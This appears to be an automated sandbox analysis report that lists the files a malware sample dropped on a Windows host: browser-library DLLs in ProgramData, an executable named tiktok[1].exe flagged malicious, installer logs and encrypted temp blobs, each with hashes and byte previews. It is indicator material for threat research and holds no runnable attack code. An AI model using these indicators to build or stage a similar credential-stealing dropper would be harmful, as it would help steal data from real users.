Preview:	ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5qk.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: kO1P1YnLst.exe, Detection: malicious, Browse Filename: wxfSIz4PAi.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: JHqNlw9U8c.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: QPoX60yhZt.exe, Detection: malicious, Browse Filename: 3R18jv6iGv.exe, Detection: malicious, Browse Filename: YEnIrzZUUw.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\iolo technologies\logs\bootstrap.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	331
Entropy (8bit):	5.199488876047769
Encrypted:	false
SSDEEP:	6:BMKL6TKstaAgrCYbTKRmLIYvgBtXSDTKyHB1JCsTYTOI0XY4eA:fiKiaXCY3KRmkYvgLXSPKQ/tY673
MD5:	A92D8138354184EBBC34FD98FE9D14CF
SHA1:	2D217A8F53BC3197892D8A0C7F46EE9723994F0C
SHA-256:	F39DF8F78416DE230240E44BD8BF9A79D8B47853D66B1045600FD220A04C9DD0
SHA-512:	FA8DC3AB454E626E630CC2F4012AB9BD3F439CBB85488E4549BA89C53CBE4C15B13E7B9BFA409D1C96EB41B12983A144470D2EC92F3F5FF95DD40C253D5468A9
Malicious:	false
Preview:	Bootstrap LogFile..-----------------..[27/04/2024 01:32:31]: Product System Mechanic Determined From 5488CB36-BE62-4606-B07B-2EE938868BD1..[27/04/2024 01:32:31]: This Brand IOLODEFAULT Not Detected As Installed..[27/04/2024 01:32:31]: No Supported Products Were Detected On This System..[27/04/2024 01:33:26]: Telemetry Data Sent..

C:\ProgramData\iolo\logs\WSComm.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5qk.3.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	346
Entropy (8bit):	5.220934387524738
Encrypted:	false
SSDEEP:	6:quS0TCfk3VotGjZb34LuP0QiloieQs0TCfk3VotGjZb34LuhE/Qiloe:r9TXVotgOLuPZiBLHTXVotgOLutit
MD5:	B0E51F5CA41A264F37D6E2BA4B106BB1
SHA1:	01FAA81DAFB2B270D7F8DB99AF15DE4BC719651C
SHA-256:	08751C7938DFA13B7306784A2B8CFCB52F119E4CED7F82DA0ED3DB1784DAAF36
SHA-512:	74D266C4770D1CF24BB4A4B790C004FF7AE419B387F420E4026CECA3D35101DF688E88425BC2B7506F2992B3C2D6A52FC2816BDB07889B4CEE3B4C78910241CD
Malicious:	false
Preview:	[04/27/24 01:32:00] PerformGetOrPost : Attempting a POST on http://svc.iolo.com/__svc/sbv/DownloadManager.ashx...[04/27/24 01:32:01] IsValidCommunication : Result := True...[04/27/24 01:32:15] PerformGetOrPost : Attempting a POST on http://svc.iolo.com/__svc/sbv/DownloadManager.ashx...[04/27/24 01:32:16] IsValidCommunication : Result := True...

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5qk.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: kO1P1YnLst.exe, Detection: malicious, Browse Filename: wxfSIz4PAi.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: JHqNlw9U8c.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: QPoX60yhZt.exe, Detection: malicious, Browse Filename: 3R18jv6iGv.exe, Detection: malicious, Browse Filename: YEnIrzZUUw.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5qk.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5qk.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5qk.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5qk.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\ApplicationInsights\02b7d1436f6e86786e74c7f14b0eeb043810a2ded0b85707d2c8e2ec408053fe\122fddqk.55u

Download File

Process:	C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	93B885ADFE0DA089CDF634904FD59F71
SHA1:	5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
SHA-256:	6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
SHA-512:	B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	410
Entropy (8bit):	5.361827289088002
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAq1KDLI4M0kvoDLI4MWuCv:ML9E4KH1qE4jE4Ks
MD5:	812F0A8C671812AA613FC139B69E8614
SHA1:	B4177437C50B25B06FB885362DA36FD171A1C5A9
SHA-256:	6D3DF2C3EA20D3A411078200AFA62DAC6AABA4210C83A2186E80195977BF0F89
SHA-512:	6A82C1F195C66FCC0533B20B8AE9B4F9CEBED6C8D7B450C574E864A60D627F3ABE32081BF65822157716F4672180E19C0DFA91D88663F7FC3CBE7FD0EB36B2EA
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5qk.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5qk.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5qk.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5qk.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5qk.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5qk.0.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	545792
Entropy (8bit):	6.384805269039956
Encrypted:	false
SSDEEP:	6144:yU3iKBTO7hQqRGoFyLmVmH6Q4vwRuGuoBhYkuFqeYAOfp+5ic6/:yU7UVGoFyLmVO6Q6wAGuoBh9Np+M/
MD5:	6C93FC68E2F01C20FB81AF24470B790C
SHA1:	D5927B38A32E30AFCF5A658612A8266476FC4AD8
SHA-256:	64A71B664D76641B35DAC312161CB356B3B3B5F0B45C9D88C8AFA547B4902580
SHA-512:	355E9677121EF17CF8C398F0C17399776D206C62014080A2C62682E1152EA0729DCC6E233358DCD6BAE009B07E3DB936D4B18EB37D6E7EBC2FE9CF8D827C4ADE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 47%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'i..'i..'i....[.7i....Y..i....X.8i...7..3i...7...i...7...i....9."i..'i..}i...7..%i...7U.&i..'i=.&i...7..&i..Rich'i..................PE..L....v)f..........................................@.......................................@.................................P...(.......@(................... ..l.......p........................... ...@............................................text...1........................... ..`.rdata..............................@..@.data...@ ..........................@....gfids..............................@..@.rsrc...@(.......*..................@..@.reloc..l.... ......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5qk.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\200f0c31

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe
File Type:	data
Category:	dropped
Size (bytes):	1514213
Entropy (8bit):	7.753986100430612
Encrypted:	false
SSDEEP:	24576:wl943dyt0CxCz0E00hQ1JwJp/rFEHoRy9SGj/8cvPOp3G+1Jp7x+bY31EIstMnjv:I63dGMZ0cGwJpjFEHoRyUG78qPOpTJVb
MD5:	DD4C66641F3A216A6925C1106D0714B4
SHA1:	34ACE672B58368A3C2BBB7842A64CEC2317EA9B0
SHA-256:	281706847FEBB930DCE18257991BB8724A7F4FEDADE40D34A606A878AE4EB261
SHA-512:	BC3DCB2858B3E2BE3B9CB7822660CE0DA3D88AF35E020A17CD8D79DBFBD46C2845034162E9BAD79B53459694AA3E8FE3A92E88C74C809FBEDCC60D29BBED8DCF
Malicious:	false
Preview:	>C&.<C&.=C&.=C&.<C&..C&.)C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C'...v.y.r...k.^1I.R%R.jH.R4U.n7G.Ick.S6z.O,A.\.U.n7G.I6V.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.~,o.T7O.Q\.x;&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.~,e.X"R.t-U.\-E.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&...o.y.t.a.O.O,U.[7..x.z.O"K.J,T.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.Kq...v...t&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.=C&.

C:\Users\user\AppData\Local\Temp\31defa75

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe
File Type:	data
Category:	dropped
Size (bytes):	1514213
Entropy (8bit):	7.753984731987231
Encrypted:	false
SSDEEP:	24576:7l943dyt0CxCz0E00hQ1JwJp/rFEHoRy9SGj/8cvPOp3G+1Jp7x+bY31EIstMnjv:p63dGMZ0cGwJpjFEHoRyUG78qPOpTJVb
MD5:	2CB9DA0B7AAB0FFD6D1F0EA71268C695
SHA1:	573533ADFA856C26BA524235B8910462E93F0525
SHA-256:	1FAA63E69538280D06D5DAF8BA1A3BBCB69C08CEFC566FB4CFCFB2ECC50A51E1
SHA-512:	FFCE129B25C2BC051BCD3757D349A4251D29A778C3F3EAEF48A725ADC69394D95D48872A90364738078FE1C0DAA0631898D90D36989FAE278FA691E2E4A4AACD
Malicious:	false
